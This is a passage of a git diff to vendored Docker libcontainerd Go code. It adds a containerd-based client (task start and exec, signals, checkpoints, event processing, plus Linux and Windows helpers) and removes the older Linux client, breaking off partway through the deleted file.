spec.Process.Terminal) + + rio, err = c.createIO(fifos, id, InitProcessName, stdinCloseSync, attachStdio) + return rio, err + }, + func(_ context.Context, _ *containerd.Client, info *containerd.TaskInfo) error { + info.Checkpoint = cp + info.Options = &runctypes.CreateOptions{ + IoUid: uint32(uid), + IoGid: uint32(gid), + NoPivotRoot: os.Getenv("DOCKER_RAMDISK") != "", + } + return nil + }) + if err != nil { + close(stdinCloseSync) + if rio != nil { + rio.Cancel() + rio.Close() + } + return -1, wrapError(err) + } + + ctr.setTask(t) + + // Signal c.createIO that it can call CloseIO + close(stdinCloseSync) + + if err := t.Start(ctx); err != nil { + if _, err := t.Delete(ctx); err != nil { + c.logger.WithError(err).WithField("container", id). + Error("failed to delete task after fail start") + } + ctr.setTask(nil) + return -1, wrapError(err) + } + + return int(t.Pid()), nil +} + +func (c *client) Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio StdioCallback) (int, error) { + ctr := c.getContainer(containerID) + if ctr == nil { + return -1, errors.WithStack(newNotFoundError("no such container")) + } + t := ctr.getTask() + if t == nil { + return -1, errors.WithStack(newInvalidParameterError("container is not running")) + } + + if p := ctr.getProcess(processID); p != nil { + return -1, errors.WithStack(newConflictError("id already in use")) + } + + var ( + p containerd.Process + rio cio.IO + err error + stdinCloseSync = make(chan struct{}) + ) + + fifos := newFIFOSet(ctr.bundleDir, processID, withStdin, spec.Terminal) + + defer func() { + if err != nil { + if rio != nil { + rio.Cancel() + rio.Close() + } + } + }() + + p, err = t.Exec(ctx, processID, spec, func(id string) (cio.IO, error) { + rio, err = c.createIO(fifos, containerID, processID, stdinCloseSync, attachStdio) + return rio, err + }) + if err != nil { + close(stdinCloseSync) + return -1, wrapError(err) + } + + ctr.addProcess(processID, p) + + // Signal c.createIO that it can call CloseIO + close(stdinCloseSync) + + if err = p.Start(ctx); err != nil { + p.Delete(context.Background()) + ctr.deleteProcess(processID) + return -1, wrapError(err) + } + + return int(p.Pid()), nil +} + +func (c *client) SignalProcess(ctx context.Context, containerID, processID string, signal int) error { + p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + return wrapError(p.Kill(ctx, syscall.Signal(signal))) +} + +func (c *client) ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error { + p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + return p.Resize(ctx, uint32(width), uint32(height)) +} + +func (c *client) CloseStdin(ctx context.Context, containerID, processID string) error { + p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + return p.CloseIO(ctx, containerd.WithStdinCloser) +} + +func (c *client) Pause(ctx context.Context, containerID string) error { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + return wrapError(p.(containerd.Task).Pause(ctx)) +} + +func (c *client) Resume(ctx context.Context, containerID string) error { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + return p.(containerd.Task).Resume(ctx) +} + +func (c *client) Stats(ctx context.Context, containerID string) (*Stats, error) { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + m, err := p.(containerd.Task).Metrics(ctx) + if err != nil { + return nil, err + } + + v, err := typeurl.UnmarshalAny(m.Data) + if err != nil { + return nil, err + } + return interfaceToStats(m.Timestamp, v), nil +} + +func (c *client) ListPids(ctx context.Context, containerID string) ([]uint32, error) { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + pis, err := p.(containerd.Task).Pids(ctx) + if err != nil { + return nil, err + } + + var pids []uint32 + for _, i := range pis { + pids = append(pids, i.Pid) + } + + return pids, nil +} + +func (c *client) Summary(ctx context.Context, containerID string) ([]Summary, error) { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + pis, err := p.(containerd.Task).Pids(ctx) + if err != nil { + return nil, err + } + + var infos []Summary + for _, pi := range pis { + i, err := typeurl.UnmarshalAny(pi.Info) + if err != nil { + return nil, errors.Wrap(err, "unable to decode process details") + } + s, err := summaryFromInterface(i) + if err != nil { + return nil, err + } + infos = append(infos, *s) + } + + return infos, nil +} + +func (c *client) DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return 255, time.Now(), nil + } + + status, err := p.(containerd.Task).Delete(ctx) + if err != nil { + return 255, time.Now(), nil + } + + if ctr := c.getContainer(containerID); ctr != nil { + ctr.setTask(nil) + } + return status.ExitCode(), status.ExitTime(), nil +} + +func (c *client) Delete(ctx context.Context, containerID string) error { + ctr := c.getContainer(containerID) + if ctr == nil { + return errors.WithStack(newNotFoundError("no such container")) + } + + if err := ctr.ctr.Delete(ctx); err != nil { + return wrapError(err) + } + + if os.Getenv("LIBCONTAINERD_NOCLEAN") != "1" { + if err := os.RemoveAll(ctr.bundleDir); err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": containerID, + "bundle": ctr.bundleDir, + }).Error("failed to remove state dir") + } + } + + c.removeContainer(containerID) + + return nil +} + +func (c *client) Status(ctx context.Context, containerID string) (Status, error) { + ctr := c.getContainer(containerID) + if ctr == nil { + return StatusUnknown, errors.WithStack(newNotFoundError("no such container")) + } + + t := ctr.getTask() + if t == nil { + return StatusUnknown, errors.WithStack(newNotFoundError("no such task")) + } + + s, err := t.Status(ctx) + if err != nil { + return StatusUnknown, wrapError(err) + } + + return Status(s.Status), nil +} + +func (c *client) CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + img, err := p.(containerd.Task).Checkpoint(ctx) + if err != nil { + return wrapError(err) + } + // Whatever happens, delete the checkpoint from containerd + defer func() { + err := c.getRemote().ImageService().Delete(context.Background(), img.Name()) + if err != nil { + c.logger.WithError(err).WithField("digest", img.Target().Digest). + Warnf("failed to delete checkpoint image") + } + }() + + b, err := content.ReadBlob(ctx, c.getRemote().ContentStore(), img.Target()) + if err != nil { + return errdefs.System(errors.Wrapf(err, "failed to retrieve checkpoint data")) + } + var index v1.Index + if err := json.Unmarshal(b, &index); err != nil { + return errdefs.System(errors.Wrapf(err, "failed to decode checkpoint data")) + } + + var cpDesc *v1.Descriptor + for _, m := range index.Manifests { + if m.MediaType == images.MediaTypeContainerd1Checkpoint { + cpDesc = &m + break + } + } + if cpDesc == nil { + return errdefs.System(errors.Wrapf(err, "invalid checkpoint")) + } + + rat, err := c.getRemote().ContentStore().ReaderAt(ctx, *cpDesc) + if err != nil { + return errdefs.System(errors.Wrapf(err, "failed to get checkpoint reader")) + } + defer rat.Close() + _, err = archive.Apply(ctx, checkpointDir, content.NewReader(rat)) + if err != nil { + return errdefs.System(errors.Wrapf(err, "failed to read checkpoint reader")) + } + + return err +} + +func (c *client) getContainer(id string) *container { + c.RLock() + ctr := c.containers[id] + c.RUnlock() + + return ctr +} + +func (c *client) removeContainer(id string) { + c.Lock() + delete(c.containers, id) + c.Unlock() +} + +func (c *client) getProcess(containerID, processID string) (containerd.Process, error) { + ctr := c.getContainer(containerID) + if ctr == nil { + return nil, errors.WithStack(newNotFoundError("no such container")) + } + + t := ctr.getTask() + if t == nil { + return nil, errors.WithStack(newNotFoundError("container is not running")) + } + if processID == InitProcessName { + return t, nil + } + + p := ctr.getProcess(processID) + if p == nil { + return nil, errors.WithStack(newNotFoundError("no such exec")) + } + return p, nil +} + +// createIO creates the io to be used by a process +// This needs to get a pointer to interface as upon closure the process may not have yet been registered +func (c *client) createIO(fifos *cio.FIFOSet, containerID, processID string, stdinCloseSync chan struct{}, attachStdio StdioCallback) (cio.IO, error) { + var ( + io *cio.DirectIO + err error + ) + + io, err = cio.NewDirectIO(context.Background(), fifos) + if err != nil { + return nil, err + } + + if io.Stdin != nil { + var ( + err error + stdinOnce sync.Once + ) + pipe := io.Stdin + io.Stdin = ioutils.NewWriteCloserWrapper(pipe, func() error { + stdinOnce.Do(func() { + err = pipe.Close() + // Do the rest in a new routine to avoid a deadlock if the + // Exec/Start call failed. + go func() { + <-stdinCloseSync + p, err := c.getProcess(containerID, processID) + if err == nil { + err = p.CloseIO(context.Background(), containerd.WithStdinCloser) + if err != nil && strings.Contains(err.Error(), "transport is closing") { + err = nil + } + } + }() + }) + return err + }) + } + + rio, err := attachStdio(io) + if err != nil { + io.Cancel() + io.Close() + } + return rio, err +} + +func (c *client) processEvent(ctr *container, et EventType, ei EventInfo) { + c.eventQ.append(ei.ContainerID, func() { + err := c.backend.ProcessEvent(ei.ContainerID, et, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ei.ContainerID, + "event": et, + "event-info": ei, + }).Error("failed to process event") + } + + if et == EventExit && ei.ProcessID != ei.ContainerID { + p := ctr.getProcess(ei.ProcessID) + if p == nil { + c.logger.WithError(errors.New("no such process")). + WithFields(logrus.Fields{ + "container": ei.ContainerID, + "process": ei.ProcessID, + }).Error("exit event") + return + } + _, err = p.Delete(context.Background()) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ei.ContainerID, + "process": ei.ProcessID, + }).Warn("failed to delete process") + } + ctr.deleteProcess(ei.ProcessID) + + ctr := c.getContainer(ei.ContainerID) + if ctr == nil { + c.logger.WithFields(logrus.Fields{ + "container": ei.ContainerID, + }).Error("failed to find container") + } else { + newFIFOSet(ctr.bundleDir, ei.ProcessID, true, false).Close() + } + } + }) +} + +func (c *client) processEventStream(ctx context.Context) { + var ( + err error + ev *events.Envelope + et EventType + ei EventInfo + ctr *container + ) + + // Filter on both namespace *and* topic. To create an "and" filter, + // this must be a single, comma-separated string + eventStream, errC := c.getRemote().EventService().Subscribe(ctx, "namespace=="+c.namespace+",topic~=|^/tasks/|") + + c.logger.WithField("namespace", c.namespace).Debug("processing event stream") + + var oomKilled bool + for { + select { + case err = <-errC: + if err != nil { + errStatus, ok := status.FromError(err) + if !ok || errStatus.Code() != codes.Canceled { + c.logger.WithError(err).Error("failed to get event") + go c.processEventStream(ctx) + } else { + c.logger.WithError(ctx.Err()).Info("stopping event stream following graceful shutdown") + } + } + return + case ev = <-eventStream: + if ev.Event == nil { + c.logger.WithField("event", ev).Warn("invalid event") + continue + } + + v, err := typeurl.UnmarshalAny(ev.Event) + if err != nil { + c.logger.WithError(err).WithField("event", ev).Warn("failed to unmarshal event") + continue + } + + c.logger.WithField("topic", ev.Topic).Debug("event") + + switch t := v.(type) { + case *apievents.TaskCreate: + et = EventCreate + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ContainerID, + Pid: t.Pid, + } + case *apievents.TaskStart: + et = EventStart + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ContainerID, + Pid: t.Pid, + } + case *apievents.TaskExit: + et = EventExit + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ID, + Pid: t.Pid, + ExitCode: t.ExitStatus, + ExitedAt: t.ExitedAt, + } + case *apievents.TaskOOM: + et = EventOOM + ei = EventInfo{ + ContainerID: t.ContainerID, + OOMKilled: true, + } + oomKilled = true + case *apievents.TaskExecAdded: + et = EventExecAdded + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ExecID, + } + case *apievents.TaskExecStarted: + et = EventExecStarted + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ExecID, + Pid: t.Pid, + } + case *apievents.TaskPaused: + et = EventPaused + ei = EventInfo{ + ContainerID: t.ContainerID, + } + case *apievents.TaskResumed: + et = EventResumed + ei = EventInfo{ + ContainerID: t.ContainerID, + } + default: + c.logger.WithFields(logrus.Fields{ + "topic": ev.Topic, + "type": reflect.TypeOf(t)}, + ).Info("ignoring event") + continue + } + + ctr = c.getContainer(ei.ContainerID) + if ctr == nil { + c.logger.WithField("container", ei.ContainerID).Warn("unknown container") + continue + } + + if oomKilled { + ctr.setOOMKilled(true) + oomKilled = false + } + ei.OOMKilled = ctr.getOOMKilled() + + c.processEvent(ctr, et, ei) + } + } +} + +func (c *client) writeContent(ctx context.Context, mediaType, ref string, r io.Reader) (*types.Descriptor, error) { + writer, err := c.getRemote().ContentStore().Writer(ctx, content.WithRef(ref)) + if err != nil { + return nil, err + } + defer writer.Close() + size, err := io.Copy(writer, r) + if err != nil { + return nil, err + } + labels := map[string]string{ + "containerd.io/gc.root": time.Now().UTC().Format(time.RFC3339), + } + if err := writer.Commit(ctx, 0, "", content.WithLabels(labels)); err != nil { + return nil, err + } + return &types.Descriptor{ + MediaType: mediaType, + Digest: writer.Digest(), + Size_: size, + }, nil +} + +func wrapError(err error) error { + switch { + case err == nil: + return nil + case containerderrors.IsNotFound(err): + return errdefs.NotFound(err) + } + + msg := err.Error() + for _, s := range []string{"container does not exist", "not found", "no such container"} { + if strings.Contains(msg, s) { + return errdefs.NotFound(err) + } + } + return err +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go b/vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go new file mode 100644 index 0000000000..b57c4d3c50 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go @@ -0,0 +1,108 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "context" + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/containerd/containerd" + "github.com/containerd/containerd/cio" + "github.com/docker/docker/pkg/idtools" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/sirupsen/logrus" +) + +func summaryFromInterface(i interface{}) (*Summary, error) { + return &Summary{}, nil +} + +func (c *client) UpdateResources(ctx context.Context, containerID string, resources *Resources) error { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + // go doesn't like the alias in 1.8, this means this need to be + // platform specific + return p.(containerd.Task).Update(ctx, containerd.WithResources((*specs.LinuxResources)(resources))) +} + +func hostIDFromMap(id uint32, mp []specs.LinuxIDMapping) int { + for _, m := range mp { + if id >= m.ContainerID && id <= m.ContainerID+m.Size-1 { + return int(m.HostID + id - m.ContainerID) + } + } + return 0 +} + +func getSpecUser(ociSpec *specs.Spec) (int, int) { + var ( + uid int + gid int + ) + + for _, ns := range ociSpec.Linux.Namespaces { + if ns.Type == specs.UserNamespace { + uid = hostIDFromMap(0, ociSpec.Linux.UIDMappings) + gid = hostIDFromMap(0, ociSpec.Linux.GIDMappings) + break + } + } + + return uid, gid +} + +func prepareBundleDir(bundleDir string, ociSpec *specs.Spec) (string, error) { + uid, gid := getSpecUser(ociSpec) + if uid == 0 && gid == 0 { + return bundleDir, idtools.MkdirAllAndChownNew(bundleDir, 0755, idtools.IDPair{UID: 0, GID: 0}) + } + + p := string(filepath.Separator) + components := strings.Split(bundleDir, string(filepath.Separator)) + for _, d := range components[1:] { + p = filepath.Join(p, d) + fi, err := os.Stat(p) + if err != nil && !os.IsNotExist(err) { + return "", err + } + if os.IsNotExist(err) || fi.Mode()&1 == 0 { + p = fmt.Sprintf("%s.%d.%d", p, uid, gid) + if err := idtools.MkdirAndChown(p, 0700, idtools.IDPair{UID: uid, GID: gid}); err != nil && !os.IsExist(err) { + return "", err + } + } + } + + return p, nil +} + +func newFIFOSet(bundleDir, processID string, withStdin, withTerminal bool) *cio.FIFOSet { + config := cio.Config{ + Terminal: withTerminal, + Stdout: filepath.Join(bundleDir, processID+"-stdout"), + } + paths := []string{config.Stdout} + + if withStdin { + config.Stdin = filepath.Join(bundleDir, processID+"-stdin") + paths = append(paths, config.Stdin) + } + if !withTerminal { + config.Stderr = filepath.Join(bundleDir, processID+"-stderr") + paths = append(paths, config.Stderr) + } + closer := func() error { + for _, path := range paths { + if err := os.RemoveAll(path); err != nil { + logrus.Warnf("libcontainerd: failed to remove fifo %v: %v", path, err) + } + } + return nil + } + + return cio.NewFIFOSet(config, closer) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go new file mode 100644 index 0000000000..4aba33e18c --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go @@ -0,0 +1,55 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "fmt" + "path/filepath" + + "github.com/containerd/containerd/cio" + "github.com/containerd/containerd/windows/hcsshimtypes" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" +) + +func summaryFromInterface(i interface{}) (*Summary, error) { + switch pd := i.(type) { + case *hcsshimtypes.ProcessDetails: + return &Summary{ + CreateTimestamp: pd.CreatedAt, + ImageName: pd.ImageName, + KernelTime100ns: pd.KernelTime_100Ns, + MemoryCommitBytes: pd.MemoryCommitBytes, + MemoryWorkingSetPrivateBytes: pd.MemoryWorkingSetPrivateBytes, + MemoryWorkingSetSharedBytes: pd.MemoryWorkingSetSharedBytes, + ProcessId: pd.ProcessID, + UserTime100ns: pd.UserTime_100Ns, + }, nil + default: + return nil, errors.Errorf("Unknown process details type %T", pd) + } +} + +func prepareBundleDir(bundleDir string, ociSpec *specs.Spec) (string, error) { + return bundleDir, nil +} + +func pipeName(containerID, processID, name string) string { + return fmt.Sprintf(`\\.\pipe\containerd-%s-%s-%s`, containerID, processID, name) +} + +func newFIFOSet(bundleDir, processID string, withStdin, withTerminal bool) *cio.FIFOSet { + containerID := filepath.Base(bundleDir) + config := cio.Config{ + Terminal: withTerminal, + Stdout: pipeName(containerID, processID, "stdout"), + } + + if withStdin { + config.Stdin = pipeName(containerID, processID, "stdin") + } + + if !config.Terminal { + config.Stderr = pipeName(containerID, processID, "stderr") + } + + return cio.NewFIFOSet(config, nil) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_linux.go b/vendor/github.com/docker/docker/libcontainerd/client_linux.go deleted file mode 100644 index 190f981865..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/client_linux.go +++ /dev/null @@ -1,605 +0,0 @@ -package libcontainerd - -import ( - "fmt" - "os" - "strings" - "sync" - "syscall" - "time" - - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/mount" - "github.com/golang/protobuf/ptypes" - "github.com/golang/protobuf/ptypes/timestamp" - specs "github.com/opencontainers/runtime-spec/specs-go" - "golang.org/x/net/context" -) - -type client struct { - clientCommon - - // Platform specific properties below here. - remote *remote - q queue - exitNotifiers map[string]*exitNotifier - liveRestore bool -} - -// GetServerVersion returns the connected server version information -func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { - resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{}) - if err != nil { - return nil, err - } - - sv := &ServerVersion{ - GetServerVersionResponse: *resp, - } - - return sv, nil -} - -// AddProcess is the handler for adding a process to an already running -// container. It's called through docker exec. It returns the system pid of the -// exec'd process. -func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (pid int, err error) { - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return -1, err - } - - spec, err := container.spec() - if err != nil { - return -1, err - } - sp := spec.Process - sp.Args = specp.Args - sp.Terminal = specp.Terminal - if len(specp.Env) > 0 { - sp.Env = specp.Env - } - if specp.Cwd != nil { - sp.Cwd = *specp.Cwd - } - if specp.User != nil { - sp.User = specs.User{ - UID: specp.User.UID, - GID: specp.User.GID, - AdditionalGids: specp.User.AdditionalGids, - } - } - if specp.Capabilities != nil { - sp.Capabilities = specp.Capabilities - } - - p := container.newProcess(processFriendlyName) - - r := &containerd.AddProcessRequest{ - Args: sp.Args, - Cwd: sp.Cwd, - Terminal: sp.Terminal, - Id: containerID, - Env: sp.Env, - User: &containerd.User{ - Uid: sp.User.UID, - Gid: sp.User.GID, - AdditionalGids: sp.User.AdditionalGids, - }, - Pid: processFriendlyName, - Stdin: p.fifo(syscall.Stdin), - Stdout: p.fifo(syscall.Stdout), - Stderr: p.fifo(syscall.Stderr), - Capabilities: sp.Capabilities, - ApparmorProfile: sp.ApparmorProfile, - SelinuxLabel: sp.SelinuxLabel, - NoNewPrivileges: sp.NoNewPrivileges, - Rlimits: convertRlimits(sp.Rlimits), - } - - fifoCtx, cancel := context.WithCancel(context.Background()) - defer func() { - if err != nil { - cancel() - } - }() - - iopipe, err := p.openFifos(fifoCtx, sp.Terminal) - if err != nil { - return -1, err - } - - resp, err := clnt.remote.apiClient.AddProcess(ctx, r) - if err != nil { - p.closeFifos(iopipe) - return -1, err - } - - var stdinOnce sync.Once - stdin := iopipe.Stdin - iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { - var err error - stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed - err = stdin.Close() - if err2 := p.sendCloseStdin(); err == nil { - err = err2 - } - }) - return err - }) - - container.processes[processFriendlyName] = p - - if err := attachStdio(*iopipe); err != nil { - p.closeFifos(iopipe) - return -1, err - } - - return int(resp.SystemPid), nil -} - -func (clnt *client) SignalProcess(containerID string, pid string, sig int) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - _, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{ - Id: containerID, - Pid: pid, - Signal: uint32(sig), - }) - return err -} - -func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - if _, err := clnt.getContainer(containerID); err != nil { - return err - } - _, err := clnt.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{ - Id: containerID, - Pid: processFriendlyName, - Width: uint32(width), - Height: uint32(height), - }) - return err -} - -func (clnt *client) Pause(containerID string) error { - return clnt.setState(containerID, StatePause) -} - -func (clnt *client) setState(containerID, state string) error { - clnt.lock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - clnt.unlock(containerID) - return err - } - if container.systemPid == 0 { - clnt.unlock(containerID) - return fmt.Errorf("No active process for container %s", containerID) - } - st := "running" - if state == StatePause { - st = "paused" - } - chstate := make(chan struct{}) - _, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{ - Id: containerID, - Pid: InitFriendlyName, - Status: st, - }) - if err != nil { - clnt.unlock(containerID) - return err - } - container.pauseMonitor.append(state, chstate) - clnt.unlock(containerID) - <-chstate - return nil -} - -func (clnt *client) Resume(containerID string) error { - return clnt.setState(containerID, StateResume) -} - -func (clnt *client) Stats(containerID string) (*Stats, error) { - resp, err := clnt.remote.apiClient.Stats(context.Background(), &containerd.StatsRequest{containerID}) - if err != nil { - return nil, err - } - return (*Stats)(resp), nil -} - -// Take care of the old 1.11.0 behavior in case the version upgrade -// happened without a clean daemon shutdown -func (clnt *client) cleanupOldRootfs(containerID string) { - // Unmount and delete the bundle folder - if mts, err := mount.GetMounts(); err == nil { - for _, mts := range mts { - if strings.HasSuffix(mts.Mountpoint, containerID+"/rootfs") { - if err := syscall.Unmount(mts.Mountpoint, syscall.MNT_DETACH); err == nil { - os.RemoveAll(strings.TrimSuffix(mts.Mountpoint, "/rootfs")) - } - break - } - } - } -} - -func (clnt *client) setExited(containerID string, exitCode uint32) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - - err := clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateExit, - ExitCode: exitCode, - }}) - - clnt.cleanupOldRootfs(containerID) - - return err -} - -func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { - cont, err := clnt.getContainerdContainer(containerID) - if err != nil { - return nil, err - } - pids := make([]int, len(cont.Pids)) - for i, p := range cont.Pids { - pids[i] = int(p) - } - return pids, nil -} - -// Summary returns a summary of the processes running in a container. -// This is a no-op on Linux. -func (clnt *client) Summary(containerID string) ([]Summary, error) { - return nil, nil -} - -func (clnt *client) getContainerdContainer(containerID string) (*containerd.Container, error) { - resp, err := clnt.remote.apiClient.State(context.Background(), &containerd.StateRequest{Id: containerID}) - if err != nil { - return nil, err - } - for _, cont := range resp.Containers { - if cont.Id == containerID { - return cont, nil - } - } - return nil, fmt.Errorf("invalid state response") -} - -func (clnt *client) UpdateResources(containerID string, resources Resources) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return err - } - if container.systemPid == 0 { - return fmt.Errorf("No active process for container %s", containerID) - } - _, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{ - Id: containerID, - Pid: InitFriendlyName, - Resources: (*containerd.UpdateResource)(&resources), - }) - if err != nil { - return err - } - return nil -} - -func (clnt *client) getExitNotifier(containerID string) *exitNotifier { - clnt.mapMutex.RLock() - defer clnt.mapMutex.RUnlock() - return clnt.exitNotifiers[containerID] -} - -func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier { - clnt.mapMutex.Lock() - w, ok := clnt.exitNotifiers[containerID] - defer clnt.mapMutex.Unlock() - if !ok { - w = &exitNotifier{c: make(chan struct{}), client: clnt} - clnt.exitNotifiers[containerID] = w - } - return w -} - -func (clnt *client) restore(cont *containerd.Container, lastEvent *containerd.Event, attachStdio StdioCallback, options ...CreateOption) (err error) { - clnt.lock(cont.Id) - defer clnt.unlock(cont.Id) - - logrus.Debugf("libcontainerd: restore container %s state %s", cont.Id, cont.Status) - - containerID := cont.Id - if _, err := clnt.getContainer(containerID); err == nil { - return fmt.Errorf("container %s is already active", containerID) - } - - defer func() { - if err != nil { - clnt.deleteContainer(cont.Id) - } - }() - - container := clnt.newContainer(cont.BundlePath, options...) - container.systemPid = systemPid(cont) - - var terminal bool - for _, p := range cont.Processes { - if p.Pid == InitFriendlyName { - terminal = p.Terminal - } - } - - fifoCtx, cancel := context.WithCancel(context.Background()) - defer func() { - if err != nil { - cancel() - } - }() - - iopipe, err := container.openFifos(fifoCtx, terminal) - if err != nil { - return err - } - var stdinOnce sync.Once - stdin := iopipe.Stdin - iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { - var err error - stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed - err = stdin.Close() - }) - return err - }) - - if err := attachStdio(*iopipe); err != nil { - container.closeFifos(iopipe) - return err - } - - clnt.appendContainer(container) - - err = clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateRestore, - Pid: container.systemPid, - }}) - - if err != nil { - container.closeFifos(iopipe) - return err - } - - if lastEvent != nil { - // This should only be a pause or resume event - if lastEvent.Type == StatePause || lastEvent.Type == StateResume { - return clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: lastEvent.Type, - Pid: container.systemPid, - }}) - } - - logrus.Warnf("libcontainerd: unexpected backlog event: %#v", lastEvent) - } - - return nil -} - -func (clnt *client) getContainerLastEventSinceTime(id string, tsp *timestamp.Timestamp) (*containerd.Event, error) { - er := &containerd.EventsRequest{ - Timestamp: tsp, - StoredOnly: true, - Id: id, - } - events, err := clnt.remote.apiClient.Events(context.Background(), er) - if err != nil { - logrus.Errorf("libcontainerd: failed to get container events stream for %s: %q", er.Id, err) - return nil, err - } - - var ev *containerd.Event - for { - e, err := events.Recv() - if err != nil { - if err.Error() == "EOF" { - break - } - logrus.Errorf("libcontainerd: failed to get container event for %s: %q", id, err) - return nil, err - } - ev = e - logrus.Debugf("libcontainerd: received past event %#v", ev) - } - - return ev, nil -} - -func (clnt *client) getContainerLastEvent(id string) (*containerd.Event, error) { - ev, err := clnt.getContainerLastEventSinceTime(id, clnt.remote.restoreFromTimestamp) - if err == nil && ev == nil { - // If ev is nil and the container is running in containerd, - // we already consumed all the event of the - // container, included the "exit" one. - // Thus, we request all events containerd has in memory for - // this container in order to get the last one (which should - // be an exit event) - logrus.Warnf("libcontainerd: client is out of sync, restore was called on a fully synced container (%s).", id) - // Request all events since beginning of time - t := time.Unix(0, 0) - tsp, err := ptypes.TimestampProto(t) - if err != nil { - logrus.Errorf("libcontainerd: getLastEventSinceTime() failed to convert timestamp: %q", err) - return nil, err - } - - return clnt.getContainerLastEventSinceTime(id, tsp) - } - - return ev, err -} - -func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error { - // Synchronize with live events - clnt.remote.Lock() - defer clnt.remote.Unlock() - // Check that containerd still knows this container. - // - // In the unlikely event that Restore for this container process - // the its past event before the main loop, the event will be - // processed twice. However, this is not an issue as all those - // events will do is change the state of the container to be - // exactly the same. - cont, err := clnt.getContainerdContainer(containerID) - // Get its last event - ev, eerr := clnt.getContainerLastEvent(containerID) - if err != nil || cont.Status == "Stopped" { - if err != nil { - logrus.Warnf("libcontainerd: failed to retrieve container %s state: %v", containerID, err) - } - if ev != nil && (ev.Pid != InitFriendlyName || ev.Type != StateExit) { - // Wait a while for the exit event - timeout := time.NewTimer(10 * time.Second) - tick := time.NewTicker(100 * time.Millisecond) - stop: - for { - select { - case <-timeout.C: - break stop - case <-tick.C: - ev, eerr = clnt.getContainerLastEvent(containerID) - if eerr != nil { - break stop - } - if ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit { - break stop - } - } - } - timeout.Stop() - tick.Stop() - } - - // get the exit status for this container, if we don't have - // one, indicate an error - ec := uint32(255) - if eerr == nil && ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit { - ec = ev.Status - } - clnt.setExited(containerID, ec) - - return nil - } - - // container is still alive - if clnt.liveRestore { - if err := clnt.restore(cont, ev, attachStdio, options...); err != nil { - logrus.Errorf("libcontainerd: error restoring %s: %v", containerID, err) - } - return nil - } - - // Kill the container if liveRestore == false - w := clnt.getOrCreateExitNotifier(containerID) - clnt.lock(cont.Id) - container := clnt.newContainer(cont.BundlePath) - container.systemPid = systemPid(cont) - clnt.appendContainer(container) - clnt.unlock(cont.Id) - - container.discardFifos() - - if err := clnt.Signal(containerID, 